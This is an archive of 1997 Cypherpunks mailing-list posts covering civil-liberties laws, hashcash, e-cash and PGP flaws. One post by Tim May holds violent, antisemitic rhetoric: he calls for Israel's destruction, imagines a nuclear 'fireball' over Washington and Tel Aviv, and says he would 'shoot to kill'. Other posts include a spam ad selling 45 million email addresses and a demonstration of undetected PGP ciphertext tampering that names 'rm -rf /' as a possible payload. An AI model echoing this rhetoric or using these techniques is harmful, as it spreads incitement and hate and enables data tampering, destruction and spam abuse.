the bills they vote on.  If this means Congress passes only 50
bills per session instead of 5,000, so be it.  As far as I am
concerned, whoever subverts this process is committing treason."

By whatever means the deed is done, there is no acceptable excuse
for voting against the Constitution, voting for tyranny.  And I
would add to Redmon's comments: Those who do read the bills, then
knowingly vote to ravage our liberties, are doubly guilty.  But
when do the treason trials begin?

The truth is that these tiny, buried provisions are often the
real intent of the law, and that the hundred, perhaps thousands,
of pages that surround them are sometimes nothing more than
elaborate window dressing.  These tiny time bombs are placed
there at the behest of federal police agencies or other power
groups whose agenda is not clearly visible to us.  And their
impact is felt long after the outward intent of the bill has been
forgotten.

Civil forfeiture--now one of the plagues of the nation--was first
introduced in the 1970s as one of those buried, almost unnoticed
provisions of a larger law.

One wonders why on earth a "health care bill" carried a provision
to confiscate the assets of people who become frightened or
discouraged enough to leave the country.  (In fact, the entire
bill was an amendment to the Internal Revenue Code.  Go figure.)

I think we all realize by now that that database of employed
people will still be around enabling government to track our
locations (and heaven knows what else about us, as the database
is enhanced and expanded) long after the touted benefits of
"welfare reform" have failed to materialize.

And most grimly of all, our drivers' licenses will be our de
facto national ID card long after immigrants have ceased to want
to come to this Land of Once Free.

It matters not one whit whether the people controlling you call
themselves R's or D's, liberals or conservatives, socialists or
even (I hate to admit) libertarians.  It doesn't matter whether
they vote for these horrors because they're not paying attention
or because they actually like such things.

What matters is that the pace of totalitarianism is increasing.
And it is coming closer to our daily lives all the time.  Once
your state passes the enabling legislation (under threat of
losing "federal welfare dollars"), it is YOUR name and Social
Security number that will be entered in that employee database
the moment you go to work for a new employer.  It is YOU who will
be unable to cash a check, board an airplane, get a passport or
be allowed any dealings with any government agency if you refuse
to give your SS number to the drivers license bureau.  It is YOU
who will be endangered by driving "illegally" if you refuse to
submit to Big Brother's licensing procedures.

It is YOU whose psoriasis, manic depression or prostate troubles
will soon be the reading matter of any bureaucrat with a
computer.  It is YOU who could be declared a member of a "foreign
terrorist" organization just because you bought a book or concert
tickets from some group the government doesn't like.  It is YOU
who could lose your home, bank account and reputation because you
made a mistake on a health insurance form.  Finally, when you
become truly desperate for freedom, it is YOU whose assets will
be seized if you try to flee this increasingly insane country.

As Ayn Rand said in Atlas Shrugged, "There's no way to rule
innocent men.  The only power government has is the power to
crack down on criminals.  Well, when there aren't enough
criminals, one makes them. One declares so many things to be a
crime that it becomes impossible for men to live without breaking
laws."

It's time to drop any pretense.  We are no longer law-abiding
citizens. We have lost our law-abiding status.  There are simply
too many laws to abide.

And because of increasingly draconian penalties and electronic
tracking mechanisms, our "lawbreaking" places us and our families
in greater jeopardy every day.

The question is: What are we going to do about it?

Write a nice, polite letter to your congressperson?  Hey, if you
think that'll help, I've got a bridge you might be interested in
buying.  (And it isn't your "bridge to the future," either.)

Vote "better people" into office?  Oh yeah, that's what we
thought we were doing in 1994.

Work to fight one bad bill or another?  Okay.  What will you do
about the 10 or 20 or 100 equally horrible bills that will be
passed behind your back while you were fighting that little
battle?  And let's say you defeat a nightmare bill this year.
What are you going to do when they sneak it back in, at the very
last minute, in some "omnibus legislation" next year?  And what
about the horrors you don't even learn about until two or three
years after they become law?

Should you try fighting these laws in the courts?  Where do you
find the resources?  Where do you find a judge who doesn't have a
vested interest in bigger, more powerful government?  And again,
for every one case decided in favor of freedom, what do you do
about the 10, 20 or 100 in which the courts decide against the
Bill of Rights?

Perhaps you'd consider trying to stop the onrush of these horrors
with a constitutional amendment--maybe one that bans "omnibus"
bills, requires that every law meet a constitutional test or
requires all congresspeople to sign statements that they've read
and understood every aspect of every bill on which they vote.
Good luck!  Good luck, first, on getting such an amendment
passed.  Then good luck getting our Constitution-scorning
"leaders" to obey it.

It is true that liberty requires eternal vigilance, and part of
that vigilance has been, traditionally, keeping a watchful eye on
laws and on lawbreaking lawmakers.  But given the current pace of
law spewing and unconstitutional regulation-writing, you could
watch, plead and struggle "within the system" 24 hours a day for
your entire life and end up infinitely less free than when you
began.  Why throw your life away on a futile effort?

Face it.  If "working within the system" could halt tyranny, the
tyrants would outlaw it.  Why do you think they encourage you to
vote, to write letters, to talk to them in public forums?  It's
to divert your energies.  To keep you tame.

"The system" as it presently exists is nothing but a rat maze.
You run around thinking you're getting somewhere.  Your masters
occasionally reward you with a little pellet that encourages you
to believe you're accomplishing something.  And in the meantime,
you are as much their property and their pawn as if you were a
slave.  In the effort of fighting them on their terms and with
their authorized and approved tools, you have given your life's
energy to them as surely as if you were toiling in their cotton
fields, under the lash of their overseer.

The only way we're going to get off this road to Hell is if we
jump off. If we, personally, as individuals, refuse to cooperate
with evil.  How we do that is up to each of us.  I can't decide
for you, nor you for me. (Unlike congresspeople, who think they
can decide for everybody.)

But this totalitarian runaway truck is never going to stop unless
we stop it, in any way we can.  Stopping it might include any
number of things: tax resistance; public civil disobedience;
wide-scale, silent non-cooperation; highly noisy non-cooperation;
boycotts; secession efforts; monkey wrenching; computer hacking;
dirty tricks against government agents; public shunning of
employees of abusive government agencies; alternative,
self-sufficient communities that provide their own medical care
and utilities.

There are thousands of avenues to take, and this is something
most of still need to give more thought to before we can build an
effective resistance.  We will each choose the courses that are
right for our own circumstances, personalities and beliefs.

Whatever we do, though, we must remember that we are all,
already, outlaws.  Not one of us can be certain of getting
through a single day without violating some law or regulation
we've never even heard of.  We are all guilty in the eyes of
today's "law."  If someone in power chooses to target us, we can
all, already, be prosecuted for something.

And I'm sure you know that your claims of "good intentions" won't
protect you, as the similar claims of politicians protect them.
Politicians are above the law.  YOU are under it.  Crushed under
it.

When you look at it that way, we have little left to lose by
breakings laws creatively and purposefully.  Yes, some of us will
suffer horrible consequences for our lawbreaking.  It is very
risky to actively resist unbridled power.  It is especially risky
to go public with resistance (unless hundreds of thousands
publicly join us), and it becomes riskier the closer we get to
tyranny.  For that reason, among many others, I would never
recommend any particular course of action to anyone--and I hope
you'll think twice before taking "advice" from anybody about
things that could jeopardize your life or well-being.

But if we don't resist in the best ways we know how--and if a
good number of us don't resist loudly and publicly--all of us
will suffer the much worse consequences of living under total
oppression.

And whatever courses of action we choose, we must remember that
this legislative "revolution" against We the People will not be
stopped by politeness.  It will not be stopped by requests.  It
will not be stopped by "working within a system" governed by
those who regard us as nothing but cattle.  It will not be
stopped by pleading for justice from those who will resort to any
degree of trickery or violence to rule us.

It will not be stopped unless we are willing to risk our lives,
our fortunes and our sacred honors to stop it.

I think of the words of Winston Churchill: "If you will not fight
for the right when you can easily win without bloodshed, if you
will not fight when your victory will be sure and not so costly,
you may come to the moment when you will have to fight with all
the odds against you and only a precarious chance for survival.
There may be a worse case.  You may have to fight when there is
no chance of victory, because it is better to perish than to live
as slaves."

***********************

NOTES on the laws listed above:

1. (Employee database) Welfare Reform Bill, H.R. 3734; became
public law 104-193 on 8/22/96; see section 453A.

2.  (Health care crimes) Health Insurance Portability and
Accountability Act of 1996, H.R. 3103; became public law 104-191
on 8/21/96.

3. (Asset confiscation for citizenship change) Same law as #2;
see sections 511-513.

4, 5, and 6. (anti-gun laws) Omnibus Appropriations Act, H.R.
3610; became public law 104-208 on 9/30/96.

7 and 8. (Terrorism & secret trials) Antiterrorism and Effective
Death Penalty Act of 1996, S. 735; became public law 104-132 on
4/24/96; see all of Title III, specifically sections 302 and 219;
also see all of Title IV, specifically sections 401, 501, 502 and
503.

9. (De facto national ID card) Began life in the Immigration
Control and Financial Responsibility Act of 1996, sections 111,
118, 119, 127 and 133; was eventually folded into the Omnibus
Appropriations Act, H.R. 3610 (which was itself formerly called
the Defense Appropriations Act--but we wouldn't want to confuse
anyone, here, would we?); became public law 104-208 on 9/30/96;
see sections 656 and 657 among others.

10. (Health care database) Health Insurance Portability and
Accountability Act of 1996, H.R. 3103; became public law 104-191
on 8/21/96; see sections 262, 263 and 264, among others.  The
various provisions that make up the full horror of this database
are scattered throughout the bill and may take hours to track
down.; this one is stealth legislation at its utmost sneakiest.

And one final, final note: Although I spent aggravating hours
verifying the specifics of these bills (a task I swear I will
never waste my life on again!), the original list of bills at the
top of this article was NOT the result of extensive research.  It
was simply what came off the top of my head when I thought of Big
Brotherish bills from the 104th Congress.  For all I know,
Congress has passed 10 times more of that sort of thing.  In
fact, the worst "law" in the list--#9, the de facto national ID
card--just came to my attention as I was writing this essay,
thanks to the enormous efforts of Jackie Juntti and Ed Lyon and
others, who researched the law.  Think of it: Thanks to
congressional stealth tactics, we had the long-dreaded national
ID card legislation for five months, without a whisper of
discussion, before freedom activists began to find out about it.
Makes you wonder what else might be lurking out there, doesn't
it?

And on that cheery note---

THE END

Copyrighted by Claire Wolfe. Permission to reprint freely
granted, provided the article is reprinted in full and that any
reprint is accompanied by this copyright statement.
-- 
=====================================================================
        LIBERTY NORTHWEST CONFERENCE AND DISCUSSION GROUP
"The only Libertarian-oriented political discussion group on the
Fidonet Z1 Backbone"...  Fidonet 1:346/16 -*- SYSOPS AREAFIX:  LIB_NW
Visit Liberty Northwest on the Web http://www.saldivar.com/lib_nw/
Email Subscriptions via the Internet:  subscribe at libnw.circuit.com

..Liberty is NEVER an option... only a condition to be lost!
======================================================================










From jya at pipeline.com  Sat Aug  9 18:43:08 1997
From: jya at pipeline.com (John Young)
Date: Sun, 10 Aug 1997 09:43:08 +0800
Subject: Masons and Fnords
Message-ID: <1.5.4.32.19970810010927.006e3e24@pop.pipeline.com>



Tim May wrote:

>--Tim May, 34th Degree Mason, former resident of Alexandria, home of the
>Masonic Temple.

Now this is modest understatement with regard to this MT, the Godzilla
of Masonic Temples, worth a side trip from the Capital of the Freeh
World. You won't believe your eyes at this pyramid scheme putting the
originals at Giza to shame.

That over-reaching Alexandria Masonic Temple is matched only by the 
Mormon in Utah and the Buddhist in W.VA and St. Peters and Angor Wat 
and ... Billy Gates' Xanadu.

Oh my, we archies yearn for return of the big piles staircasing to any jesus
that
moves your mountains of loot from your temple to ours.







From azur at netcom.com  Sat Aug  9 19:39:33 1997
From: azur at netcom.com (Steve Schear)
Date: Sun, 10 Aug 1997 10:39:33 +0800
Subject: some hashcash advocacy
In-Reply-To: <97Aug8.131019edt.32257@brickwall.ceddec.com>
Message-ID: 



At 4:53 PM -0700 8/8/97, Kent Crispin wrote:>I didn't read the code, but it
seems that the double spending
>protection is just local to the recipient (ie, there isn't a trusted
>central clearinghouse that checks against double spending on a global
>basis).  Thus, a spammer could calculate postage for a message, then
>send 100000 copies.

My understanding is that value of hashcash postage is imtimately involved
with receptient email address, thus mass duplication is prohibited.

--Steve







From whgiii at amaranth.com  Sat Aug  9 20:22:08 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 10 Aug 1997 11:22:08 +0800
Subject: OverRun Msgs Re: Denning questions/reverses her position?
In-Reply-To: <199708010622.AAA19605@infowest.com>
Message-ID: <199708100318.WAA18360@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708010622.AAA19605 at infowest.com>, on 08/01/97 
   at 06:10 AM, "Attila T. Hun"  said:

>    dunno why the message was repeated at cyberpass --each of the 55
>    copies I received as of 20 minutes ago has exactly the same header
>    date from cyberpass.  that and one of them smoked the primary
>    mailbox with a couple hundred null characters.  hun.attila.org
>    was offline so it could not have generated the extra messages --so
>    where did they loop?  only the shadow knows. If it is something
>    by remote SMPT added on, I apologize for the inconvenience.

Hi,

Sorry I'm late on this but I just got back from vacation. :)

Seems to have been a problem at infowest.com as all the messages have
unique message ID's from that domain.

I'll be trying to catch up on my mail this weekend but there were +3000
messages in my mailbox so it may take awhile (at least I only have to
reply to attila's +50 messages once ).


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM+0lYI9Co1n+aLhhAQHMxgP/fBCGYkO854JbZGc5lwNbfIja9ydRsdSN
UHlaorboNQM2TXsWPJyRSgEagzH3kptanLNeLxOJTOIW1WiArF/JBzQXRtWex5BP
m7ElRdut96/fvHy6Y/YZsgsTq6HYFmjjr5vUwQd+SMgS/EBkceg63jx2kUPMf9yv
w03RkgUZW50=
=d68F
-----END PGP SIGNATURE-----






From tcmay at got.net  Sat Aug  9 20:40:18 1997
From: tcmay at got.net (Tim May)
Date: Sun, 10 Aug 1997 11:40:18 +0800
Subject: Cypherpunks and Unbreakable Crypto...Terrorists?
In-Reply-To: <199708100106.SAA22881@sirius.infonex.com>
Message-ID: 




[WARNING: This posts contains opinions and recommendations for action
forbidden under the Anti-Terrorism Act of 1995.]


Yep, these are a lot of the things I've become a felon for. Funny thing,
none of these things are "crimes" against my neighbors in any reasonable or
common sense way. None of these felonies involve killing my neighbors,
stealing what is theirs from them, raping their daughters, or even
trespassing on their land. The crimes are against some nebulous, Big
Brotherish sense of "standards.

At 7:02 PM -0700 8/9/97, WinSock Remailer wrote:
>LAND-MINE LEGISLATION
>
>by Claire Wolfe
>
>Let me run by you a brief list of items that are "the law" in
>America today.  As you read, consider what all these have in
>common.
>
>1.  A national database of employed people.

I'm not in this database, and every year I pick a different "occupation" on
my IRS forms. So far, I've not been contacted by the TP on this one.

>2.  100 pages of new "health care crimes," for which the penalty
>is (among other things) seizure of assets from both doctors and
>patients.

I plead nolo contendre on this one.

>4.  The largest gun confiscation in U. S. history--which is also
>an unconstitutional ex post facto law and the first law ever to
>remove people's constitutional rights for committing a
>misdemeanor.

I'm a major felon in Kalifornia on this one, though they haven't charged me
yet. Talk about ex post facto...the law requires that I provide proof about
the dispostion of AR-15s, Valmets, and other assorted "assault rifles" that
I bought and sold (and maybe cached in safe places) years ago. I'm a felon
for not having gotten forms filled out in 1980 that weren't mandated at the
time! Like most others who bought such guns, my attitude has been "Fuck
you. Trespass on my property and I shoot to kill."

(And there's still a flourishing market in black market guns. The Feds have
no justification for gun registration, waiting periods, etc.)

>5.  A law banning guns in ill-defined school zones; random
>roadblocks may be used for enforcement; gun-bearing residents
>could become federal criminals just by stepping outside their
>doors or getting into vehicles.

Yeah, like the guy stopped for speeding as he entered the magic "1000
yards" range of a school--at night, no less. The cops searched his car,
found a gun, and charged him under this new felony provision of the gun
laws.

(And they have the nerve to wonder why McVeigh said "Enough!!!")

>7.  A law enabling the executive branch to declare various groups
>"terrorist"--without stating any reason and without the
>possibility of appeal.  Once a group has been so declared, its
>mailing and membership lists must be turned over to the
>government.

Under the Anti-Terrorism Act of 1995, several groups I am linked to are
probably "terrorist" groups. Even donating time or money to groups
interested in the destruction of the illegal Zionist Entity meets this
criterion.

( I have nothing against Jews. Kind of a funny religion, with the silly
hair and all. But harmless. However, the notion that Jews born in Europe
and having European ancestors for 300 or 500 or whatever years, and
"native" ancestors, too, could consult their "Book" and conclude that Arabs
and Palestinians with actual title and possession to land in Haifa,
Jerusalem, etc.  could and should be kicked off and told to go live in
refugee tents in the desert...well, the State of Israel must be destroyed,
and I am proud that unbreakable crypto is helping the "terrorists"
accomplish this. Under Klinton's laws, this makes my support of Cypherpunks
actions a "terrorist act." Read the law.)


>10.  And my personal favorite--a national database, now being
>constructed, that will contain every exchange and observation
>that takes place in your doctor's office.  This includes records
>of your prescriptions, your hemorrhoids and your mental illness.
>It also includes--by law--any statements you  make ("Doc, I'm
>worried my kid may be on drugs," "Doc, I've been so stressed out
>lately I feel about ready to go postal.") and any observations
>your doctor makes about your mental or physical condition,
>whether accurate or not, whether made with your knowledge or not.
>For the time being, there will be zero (count  em, zero) privacy
>safeguards on this data.  But don't worry, your government will
>protect you with some undefined "privacy standards" in a few
>years.

Like the guy who had his guns taken away because his psychiatrist decided
he was a "threat" of some sort....and he was only seeing the shrink because
the courts ordered it as part of a "mediation process" in a divorce case.

Shades of the U.S.S.R. and its psychiatric hospitals. "Anyone who believes
the government is out to get him is obviously delusional...he cannot be
allowed to own weapons of any sort."

A nice racket, eh? No doubt Jefferson and the other Founders would be
interested to learn that the State had figured out a way to disarm anyone
who might ever be a threat to their actions. So much for Jefferson's
revolution every 20 years.

>All of the above items are the law of the land.  Federal law.
>What else do they have in common?
>
>Well, when I ask this question to audiences, I usually get the
>answer, "They're all unconstitutional."

Yep. So what else is nu?

(Nu...E over h...the defining equation of the fireball which will take out
these statists in Washington, Tel Aviv, and the other fascist imperial
capitals.)


--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From azur at netcom.com  Sat Aug  9 21:15:07 1997
From: azur at netcom.com (Steve Schear)
Date: Sun, 10 Aug 1997 12:15:07 +0800
Subject: uncensorable net based payment system?
In-Reply-To: 
Message-ID: 



At 10:14 AM -0400 7/31/97, Vincent Cate wrote:
>Adam Back  said:
>But you are right that it is an asset continually dropping in value, so
>it is an odd thing to back a currency with.  Would only want to keep
>enough money in it to do what you currently wanted to do, not as a long
>term investment.
>
>I could imaging just gradually increasing it so that $0.25 for 1 megabyte
>today became $0.25 for 1.1 megabytes in 3 months, or something like that.

Not very different from how one might handle a gold-denominated and backed
ecash coin.  Real gold must be stored in a repository which charges a
storage and handling fee.  This can integrated with the coin value by
applying a negative interest rate to the coin based on the epoch in which
the coin is issued.  So coins are redeemed at a lower than initial value
(assuming no change in the gold value figured in whatever unit it is being
exchanged).

--Steve







From theserve at msn.com  Sun Aug 10 13:31:29 1997
From: theserve at msn.com (theserve at msn.com)
Date: Sun, 10 Aug 1997 13:31:29 -0700 (PDT)
Subject: BEAT THIS !!!!!
Message-ID: <59607948321GDREW!@232Frame31.com>


//////////////////////////////////////////
45,000,000 + E-MAIL NAMES
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

45,000,000+  Yes that's right, FORTY FIVE MILLION PLUS
E-Mail addresses on CD's.  Your Cost $119.00 plus
$5.00 for shipping and handling.

Unlike some other name sellers who give you part of what they
promise and tell you they will send the rest later and then 
disappear, we send you ALL 45,000,000 + names immediately. 

Want them overnight add $15.00

These are brand new names, with no duplicates, in text format
for easy use with your Bulk E-mail software programs.

Order now - will not last long at this price only taking limited
orders as we do not want to saturate the market with these names.

Send  Check or Money Order Only - (No Cash) to:

HPC
2887 North Green Valley Parkway
Suite # 298
Henderson , Nevada 89014
(702) 454-2563

Name ___________________________________________________
Address_________________________________________________
City _____________________ State _______ Zip ___________
Email Address __________________________________________

_____ Send me the 45,000,000 E-mail addresses for  $119.00
           plus $5.00 shipping and handling (total $124.00)

_____ Send me the 45,000,000 E-mail addresses for $119.00
           plus $5.00 for shipping and handling and $15.00 for
           overnight service (total $139.00)

Make all checks and Money Orders payable to : "HPC"

(Checks held 5 business days)

(please print this order form) 


Hpc/897








From ldeliverer at hotmail.com  Sat Aug  9 22:33:14 1997
From: ldeliverer at hotmail.com (last deliverer)
Date: Sun, 10 Aug 1997 13:33:14 +0800
Subject: Using Hotmail as an exit remailer
Message-ID: <199708100521.WAA24747@f36.hotmail.com>



Congratulations to Ian Goldberg on his great script for sending via

Hotmail!  This is sent using the script, with the following info.

The proxy comes from the web page Ian supplied:



$login is "ldeliverer";

$passwd is "xxxx";

$proxyhost is 'secure.escape.ca';

$proxyport is 80;



(Warning: sometimes hotmail eats equals signs.)



The only problem is you need to install several extra modules into Perl.

I had to add these packages:



Data-Dumper-2.07

IO-1.15

MD5-1.7

MIME-Base64-2.03

libnet-1.0505

libwww-perl-5.10



Now let's modify it to work with rocketmail, usa.net, etc.  Be nice to

see an account-creation script, too.



Good job, Ian.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From admin at CyberSpaceTechnologies.com  Sat Aug  9 22:38:24 1997
From: admin at CyberSpaceTechnologies.com (David D.W. Downey)
Date: Sun, 10 Aug 1997 13:38:24 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca>
Message-ID: <33ED8713.EF5C078@cyberspacetechnologies.com>



You know you have made alot of assumptions about me that are neither
warranted nor given basis for existing from my posting. You are just as
guilty as I am on assumptions. So before *you* get all high and mighty,
figure out first if that is *actually* who I am. Don't use me as a
scapegoat that you can use to expound *your* particular beliefs about,
just as you take offense at some of the assumptions I made regarding
TruthMonger. I do not advocate anything but my own personal thoughts on
matters. Neither do I walk *any* party line. (In fact I am registered as
independant so that I am forced to be impartial on issues as I am then
not stuck with any one parties beliefs. This little flare of temper on
my part though does show me one thing at least. There are *many* here
that do just the same type of lumping as they accuse me of. Hmm, I
forgot. Everyone is perfect, therefore this post is not real and neither
are you as in a perfect world there would be no need for me to have this
discussion. In that case, I bid you an unreal goodnight.






From kent at songbird.com  Sat Aug  9 22:49:42 1997
From: kent at songbird.com (Kent Crispin)
Date: Sun, 10 Aug 1997 13:49:42 +0800
Subject: some hashcash advocacy
In-Reply-To: <19970808165350.55775@bywater.songbird.com>
Message-ID: <19970809223727.64534@bywater.songbird.com>



On Sat, Aug 09, 1997 at 10:14:28AM +0100, Adam Back wrote:
[...]
> You missed one aspect of the design.  What the collision is calculated
> on is the recipients email address.  If the collision is on someone
> elses email address, you reject it out of hand.

Ah -- of course.  

[...]

> [btw: Kent: I tried out your .midi file under win95, all I had to do
> was double click on it.  Almost melodic in an weird modern sort of
> way.  Most cool anyway :-]

Of course, I am prejudiced, but I seriously think it qualifies as
legitimate art.  I spent a fair amount of time tweaking things so it
would sound good to my ear. 

Years ago I did a lot of experimentation with algorithmically
generated music -- it really grows on you.  In "the old days" of DOS I
had code that would drive a midi synth directly -- putting things to
midi files makes things static, and not quite as interesting -- I liked 
having things that never sounded exactly the same thing twice.  But I
haven't had time to keep up with midi drivers in the Windows world. 

But this experiment sends my mind twitching off in other aesthetic 
directions -- your code was short enough so that it isn't boring -- 
if you had 20 minutes of "music" like that it would drive you nuts, 
and I would like to try some longer things -- a couple hundred lines 
of C code, for example.  To make that work I was thinking of putting 
in a strong basic harmonic background, like a blues progression, and 
using the code text to drive a solo voice over it.  Something like 
the "Triple-DES blues"...

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From snow at smoke.suba.com  Sun Aug 10 00:27:20 1997
From: snow at smoke.suba.com (snow)
Date: Sun, 10 Aug 1997 15:27:20 +0800
Subject: Denning backs away from GAK
In-Reply-To: <19970802043128.30258.qmail@zipcon.net>
Message-ID: 



On Fri, 1 Aug 1997, Mike Duvos wrote:
> This is obviously the strategy here.  If we lend credibility to the
> examination of chicken entrails because the Sorcerer is saying something
> we agree with, then we are powerless to denounce the process as flim-flam
> when we wake up one morning and find ourselves no longer in the Sorcerer's
> graces. 

	Nonsense. 

	If we were dealing with rational people here, or even people 
irrational people who had an attention span & a memory, you would be right,
but we are dealing with the USG, and the electorate. Their attention span
won't get them across a street without loosing interest, and when they get
to the other side, they have forgotten what they were after any way. 

> As Tim says, stick with Constitutional arguments, not utilitarian ones,
> and beware of Wise Persons from the East bearing Gifts.

	Problem is, the constitution isn't worth the paper it is printed 
on any more.

Petro, Christopher C.
snow at smoke.suba.com






From jrennie at hardy.ocs.mq.edu.au  Sun Aug 10 01:38:27 1997
From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE)
Date: Sun, 10 Aug 1997 16:38:27 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <3.0.2.32.19970809155403.04096a20@ctrl-alt-del.com>
Message-ID: 



> > The largest is Roman Catholic 
> 
> Which some Christian sects argue is not Christian.  (For an extreme view of
> this, read the tract "The Death Cookie" published by Jack T. Chick. It can
> be obtained from http://www.jackchick.com/ .)
> 

I'm inclined to agree with the RC's not being The same as prodestants 
comment. Why else would you have had Luther and the other reformers if 
some of catholicism wasn't a problem ??


> The founders of this country were of many different belief systems.  Many
> of them were hated and reviled by the clerics of their day.  Of course,
> evangelical Christians gloss over these facts in an effort to continue
> their ~2,000 years of enslavement of the minds of men.
> 

Is it worth noting at this point that an evangilical Christian and the 
religious right have little in common. Evangelicals (I'm one) belive the 
Bible to be the word of God etc.. but don't add anythign else to it and 
certianly wouldn't force thier beliefs down your throat. They would 

> 
> >Next, you attack christians for
> >trying to control the content made available on the internet. 
> 
> At last!  The plan exposed!  Damn right he attacks you!  But Christians get
> pretty touchy when faced with criticism of their agenda.  (Or mentioning
> that their beliefs are NOT the word of God, of exposing the flaws in
> Christianity, or having any view that conflicts with the "One True God(tm)".)
> 

I would also have a problem with Christians controlling and censoring the 
net. I would welcome (and do welcome) sites that which to argue against 
Christianity. What wrong with that ?? It simply provides a forum for 
Christians to defend thier beliefs. Besides if I censor you now because i 
find your content un acceptable whats to stop you censoring me later when 
your in the majority ! What utter stupidity to load the gun for others. 
Particularly as i am a Christian I WOULD be critical of some of the 
religious rights ideas and agendas and would happily argue from the Bible 
that they are not a good thing.


> In other words, you can claim it is voluntary and make it look like you are
> giving people a choice as you push your morality down their throats.  The
> Bible Beaters try to impose their views of what is right and wrong, but get
> pretty offended and huffy when others try and do the same thing.  (Like
> when they push School Prayer, but freak out when the pagans want the same
> options.)

I thought school pray was outlawed in the states ?? 

> 
> How would you react if the ratings groups were stacked with Athiests,
> Wiccans, Tantrics, and Jainists?  Would you be willing to accept their
> judgements on the acceptability of your beliefs and speech?
> 

Would they be willing to accpet my view on thiers ?? If yes then i'll 
accept thiers on mine


> >Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt
> >the spread of trash that *most* humans would want out of of the reach of
> >their children?

Such as ?? As has been said before you can get censorware to control 
thier access.


> Children need to be challenged by ideas that are different from their own.
> If they are not, then they grow up with ideas that they cannot
> intellectually defend.  They grow up intelecually squishy.

I must agree with that point

> I have known far too many Christians who never read anything that
> challenges their basic belief structure.  Nothing that could dare shake
> their faith in God and the Bible.  In their isolation, they are taught to
> believe ideas that have no rational defense.  (Like Biblical inerrancy and
> Creationism.)  When challenged, these outcasts from reason have to rely on
> the "moral authority" of their unseen God or other appeals to authority to
> try and defend their irrational beliefs.

Christians whould read challenging stuff. IT expands thier mind and 
strengthens thier beliefs (Well i find it does), and in my expirence a 
Christian who cant defend thier faith needs to learn more. Although i 
would disagree with dismissing creationism and Biblical inerrancey. (not 
that is is an appropriate forum for such a discussion)

Well intersting post. I hope the response is of some use.

Jason =8-]






From dlv at bwalk.dm.com  Sun Aug 10 01:44:04 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Aug 1997 16:44:04 +0800
Subject: uncensorable net based payment system?
In-Reply-To: 
Message-ID: <9oo8ae7w165w@bwalk.dm.com>



Steve Schear  writes:

> Not very different from how one might handle a gold-denominated and backed
> ecash coin.  Real gold must be stored in a repository which charges a
> storage and handling fee.  This can integrated with the coin value by
> applying a negative interest rate to the coin based on the epoch in which
> the coin is issued.  So coins are redeemed at a lower than initial value
> (assuming no change in the gold value figured in whatever unit it is being
> exchanged).

I used to models of various commodities and the common wisdom is:

the cost of carrying precious metals (gold, silver, platinum, palladium)
is so negligible that they can be treated as foreigh currencies with
interest rates. That's how most people treat them in practice.
(There are more exotic metals with little carrying costs, like
rubidium...)

Commodities like oil, gas, lumber, as well as baser metals (aluminium, copper)
have a cost of carry that must be figured in your model.

I suggest that if you want to model internet bandwidth as a commodity, you
must assume that it depreciates as it becomes less scare.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From gary at hotlava.com  Sun Aug 10 05:21:54 1997
From: gary at hotlava.com (Gary Howland)
Date: Sun, 10 Aug 1997 20:21:54 +0800
Subject: pgp -c undetectable change to ciphertext? (was Re: Hipped on PGP) [SYSTEMICS]
In-Reply-To: <199708091742.SAA02232@server.test.net>
Message-ID: <199708101208.FAA23504@toad.com>



> Ian Grigg  writes:
> > [Gary Howland gives talk at HIP on technical PGP flaws, 0xDEADBEEF etc]
> >
> > And for the record, whilst Gary's attack to change conventionally
> > encrypted files without detection was unknown to the PGP team at the
> > moment, we can be sure that it will be addressed.

It's not just unconventionally encrypted files - any encrypted file
that is unsigned can be modified without detection.  I brought this
to everyones attention because far too many people assume that encryption
provides integrity.


> Hmm.  Change pgp -c files you say.  Lets see... do you mean this:
> 
> % echo hello world > junk
> % pgp -c +compress=off -zfred junk
> % sed 's/....$/adam/' < junk.pgp > junk2.pgp
> % pgp -zfred junk2.pgp
> % cat junk2
> hello wo�P?t
> 
> That much is obvious.
> 
> (pgp doesn't complain or even notice the above btw ... there is no
> checksum and so you can just garble the file, if you so wish, and pgp
> won't complain).

Yes, this is part of the point I was making.


> Or did Gary find a way to undetectably modify ciphertext without
> turning off compression?

Of course it is easier to modify uncompressed files, but even compressed
files can be tampered with - it's just an awful lot harder.

 
> Could you or he elaborate on your attack?  

In addition to turning files to garbage, I was pointing out that files can
be truncated.  This could be very serious, if, say, you removed the second
of a pair of financial transactions, or perhaps removed the last line of
a security program, eg. if the last line of a script is "chmod -w filename"
and you can remove this line, then you may be in trouble.

As well as trashing files, and truncating them, it is also important
to remember that the last 8 bytes can be modified without detection
if the plaintext is known.  This could be very serious.  Think of
the damage that could be done in 8 bytes ( "rm -rf /").

I agree that these attacks are very unlikely to occur, but I just wanted
to bring it to everyone's attention.

 

> If you're using PGP with compress=on, then I suspect your chances of
